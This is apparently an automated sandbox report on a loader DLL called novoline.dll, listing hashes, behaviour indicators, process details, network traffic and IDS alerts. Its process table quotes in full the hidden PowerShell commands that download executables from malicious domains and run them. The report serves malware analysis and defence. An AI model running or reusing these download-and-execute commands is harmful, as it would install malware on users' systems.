| File name: | novoline.dll |
| Full analysis: | https://app.any.run/tasks/7768b062-6ec5-4ce9-9bcb-5d4a3b0aff9f |
| Verdict: | Malicious activity |
| Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
| Analysis date: | August 16, 2025, 16:40:58 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/vnd.microsoft.portable-executable |
| File info: | PE32+ executable (DLL) (console) x86-64, for MS Windows, 6 sections |
| MD5: | 965CF751D1D47F000F9A2E75D6677BD0 |
| SHA1: | C8CAE5A6D51EE7E3F16878553F762C80B5BA9DB8 |
| SHA256: | F865A0EBA0084B391D6B97C5E21745385C79B5F7A32BF28D86E8A382716B1588 |
| SSDEEP: | 768:1AOCpX7jGaytlFBolBVSnDMSUTd39lq0GPNfZrN8Q9EVpXKTy3b6Nq:1AdQFWHOUTd39Q0mjrNo3b6Nq |
MALICIOUS
Run PowerShell with an invisible window
- powershell.exe (PID: 3480)
- powershell.exe (PID: 888)
SUSPICIOUS
Application launched itself
- cmd.exe (PID: 7020)
- cmd.exe (PID: 7052)
Starts CMD.EXE for commands execution
- rundll32.exe (PID: 4948)
- cmd.exe (PID: 7020)
- cmd.exe (PID: 7052)
Downloads file from URI via Powershell
- powershell.exe (PID: 888)
- powershell.exe (PID: 3480)
Starts process via Powershell
- powershell.exe (PID: 888)
- powershell.exe (PID: 3480)
Starts POWERSHELL.EXE for commands execution
- cmd.exe (PID: 1964)
- cmd.exe (PID: 3400)
Manipulates environment variables
- powershell.exe (PID: 888)
- powershell.exe (PID: 3480)
Executable content was dropped or overwritten
- powershell.exe (PID: 888)
- powershell.exe (PID: 3480)
Executes application which crashes
- BK279227.exe (PID: 5460)
- BK329983.exe (PID: 2120)
INFO
Checks proxy server information
- powershell.exe (PID: 3480)
- powershell.exe (PID: 888)
- WerFault.exe (PID: 1468)
- WerFault.exe (PID: 3576)
- slui.exe (PID: 5952)
Disables trace logs
- powershell.exe (PID: 888)
- powershell.exe (PID: 3480)
The executable file from the user directory is run by the Powershell process
- BK329983.exe (PID: 2120)
- BK279227.exe (PID: 5460)
Checks supported languages
- BK329983.exe (PID: 2120)
- BK279227.exe (PID: 5460)
Creates files or folders in the user directory
- WerFault.exe (PID: 1468)
- WerFault.exe (PID: 3576)
Reads the computer name
- BK329983.exe (PID: 2120)
- BK279227.exe (PID: 5460)
Reads the software policy settings
- WerFault.exe (PID: 1468)
- WerFault.exe (PID: 3576)
- slui.exe (PID: 5952)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .exe | | | Win64 Executable (generic) (87.3) |
|---|---|---|
| .exe | | | Generic Win/DOS Executable (6.3) |
| .exe | | | DOS Executable Generic (6.3) |
EXIF
EXE
| MachineType: | AMD AMD64 |
|---|---|
| TimeStamp: | 2025:08:16 16:34:48+00:00 |
| ImageFileCharacteristics: | Executable, Large address aware, DLL |
| PEType: | PE32+ |
| LinkerVersion: | 14.44 |
| CodeSize: | 46080 |
| InitializedDataSize: | 35840 |
| UninitializedDataSize: | - |
| EntryPoint: | 0xb700 |
| OSVersion: | 6 |
| ImageVersion: | - |
| SubsystemVersion: | 6 |
| Subsystem: | Windows command line |
Total processes
152
Monitored processes
17
Malicious processes
2
Suspicious processes
5
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 888 | powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://pubshierstext.top/Stb/Retev.php?bl=Dkvjdv3zhJiNan11lPPRE008.txt' -OutFile $env:APPDATA\BK329983.exe; Start-Process -FilePath $env:APPDATA\BK329983.exe -WindowStyle Hidden }" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1468 | C:\WINDOWS\system32\WerFault.exe -u -p 2120 -s 356 | C:\Windows\System32\WerFault.exe | BK329983.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Problem Reporting Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1964 | cmd.exe /c powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://pubshierstext.top/Stb/Retev.php?bl=Dkvjdv3zhJiNan11lPPRE008.txt' -OutFile $env:APPDATA\BK329983.exe; Start-Process -FilePath $env:APPDATA\BK329983.exe -WindowStyle Hidden }" | C:\Windows\System32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2120 | "C:\Users\admin\AppData\Roaming\BK329983.exe" | C:\Users\admin\AppData\Roaming\BK329983.exe | powershell.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Exit code: 3221225477 Modules
| |||||||||||||||
| 2200 | C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache | C:\Windows\System32\svchost.exe | services.exe | ||||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Host Process for Windows Services Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3400 | cmd.exe /c powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://frozi.cc/Stb/Retev.php?bl=SlJURzJSSLqCMDTxDoLCW013.txt' -OutFile $env:APPDATA\BK279227.exe; Start-Process -FilePath $env:APPDATA\BK279227.exe -WindowStyle Hidden }" | C:\Windows\System32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3480 | powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://frozi.cc/Stb/Retev.php?bl=SlJURzJSSLqCMDTxDoLCW013.txt' -OutFile $env:APPDATA\BK279227.exe; Start-Process -FilePath $env:APPDATA\BK279227.exe -WindowStyle Hidden }" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3576 | C:\WINDOWS\system32\WerFault.exe -u -p 5460 -s 380 | C:\Windows\System32\WerFault.exe | BK279227.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Problem Reporting Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3960 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4200 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
Total events
26 237
Read events
26 237
Write events
0
Delete events
0
Modification events
Executable files
2
Suspicious files
1
Text files
8
Unknown types
4
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 1468 | WerFault.exe | C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_BK329983.exe_6a3743f2567fb234e6e98f5ae39f171281479e_861e4c4c_ce546d24-8ed3-4333-9140-ead3cb7324d1\Report.wer | — | |
MD5:— | SHA256:— | |||
| 3576 | WerFault.exe | C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_BK279227.exe_60ad162334df661d26f61c6ab4687929182d4f5_410a1b73_61a02f25-6e82-4e8e-918c-a5f0081ac57e\Report.wer | — | |
MD5:— | SHA256:— | |||
| 888 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_wkizcm21.wns.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 3576 | WerFault.exe | C:\ProgramData\Microsoft\Windows\WER\Temp\WERF38.tmp.dmp | dmp | |
MD5:62A92A99C780B698B5FBCFD061B42D54 | SHA256:CD55A50D6D8DD0FD88BED79E6CECB0C62001158CE0718ED061B2D55873E20AEC | |||
| 3480 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_1niko0x0.gka.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 888 | powershell.exe | C:\Users\admin\AppData\Roaming\BK329983.exe | executable | |
MD5:BE46E986D06540304BCE91EC8CABDE5F | SHA256:52C7B152FFDEDF32E359793C19BF460EAC0160AE341D05B490CE89DC5DF223E0 | |||
| 3480 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_42kfzvyq.5qg.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 888 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_jbn2efxc.vko.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 1468 | WerFault.exe | C:\ProgramData\Microsoft\Windows\WER\Temp\WERF930.tmp.dmp | dmp | |
MD5:1D54FF2B914014861B30A16D5CB19431 | SHA256:A365A292C395455334C2588AD1AFB300CF0D2C1DEB15142F52325E884E7A1394 | |||
| 888 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:A30BDDFAB986CA7E25B7109E7C12F86A | SHA256:0699854130C9FA669AEC6FCB1F046A2BE5B8944C559794E41DC45FB33CA8BB26 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
51
TCP/UDP connections
60
DNS requests
22
Threats
25
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
5944 | MoUsoCoreWorker.exe | GET | 200 | 23.216.77.20:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | DE | binary | 825 b | whitelisted |
1268 | svchost.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | NL | binary | 814 b | whitelisted |
5944 | MoUsoCoreWorker.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | NL | binary | 814 b | whitelisted |
— | — | POST | 200 | 20.190.160.2:443 | https://login.live.com/RST2.srf | US | xml | 1.24 Kb | whitelisted |
— | — | POST | 400 | 20.190.160.2:443 | https://login.live.com/ppsecure/deviceaddcredential.srf | US | text | 203 b | whitelisted |
— | — | GET | 200 | 172.67.215.241:443 | https://frozi.cc/Stb/Retev.php?bl=SlJURzJSSLqCMDTxDoLCW013.txt | US | executable | 599 Kb | malicious |
— | — | POST | 400 | 20.190.160.4:443 | https://login.live.com/ppsecure/deviceaddcredential.srf | US | text | 203 b | whitelisted |
— | — | POST | 400 | 40.126.32.72:443 | https://login.live.com/ppsecure/deviceaddcredential.srf | US | text | 203 b | whitelisted |
— | — | POST | 400 | 40.126.32.134:443 | https://login.live.com/ppsecure/deviceaddcredential.srf | US | text | 203 b | whitelisted |
— | — | GET | 304 | 74.179.77.204:443 | https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL | US | — | — | unknown |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
5944 | MoUsoCoreWorker.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
3584 | RUXIMICS.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
1268 | svchost.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
1268 | svchost.exe | 23.216.77.20:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
5944 | MoUsoCoreWorker.exe | 23.216.77.20:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
1268 | svchost.exe | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted |
5944 | MoUsoCoreWorker.exe | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted |
2760 | svchost.exe | 40.126.31.130:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
DNS requests
Domain | IP | Reputation |
|---|---|---|
google.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
settings-win.data.microsoft.com |
| whitelisted |
login.live.com |
| whitelisted |
frozi.cc |
| malicious |
pubshierstext.top |
| malicious |
slscr.update.microsoft.com |
| whitelisted |
fe3cr.delivery.mp.microsoft.com |
| whitelisted |
watson.events.data.microsoft.com |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
— | — | Unknown Traffic | ET USER_AGENTS Microsoft Dr Watson User-Agent (MSDW) |
2200 | svchost.exe | A Network Trojan was detected | MALWARE [ANY.RUN] Suspected Domain Associated with Malware Distribution (frozi .cc) |
2200 | svchost.exe | Potentially Bad Traffic | ET DNS Query for .cc TLD |
2200 | svchost.exe | Potentially Bad Traffic | ET DNS Query to a *.top domain - Likely Hostile |
— | — | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
— | — | Potential Corporate Privacy Violation | ET INFO PE EXE or DLL Windows file download HTTP |
— | — | A Network Trojan was detected | ET MALWARE Possible Windows executable sent when remote host claims to send html content |
— | — | Misc activity | ET INFO Packed Executable Download |
— | — | Potentially Bad Traffic | ET INFO HTTP Request to a *.top domain |
— | — | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |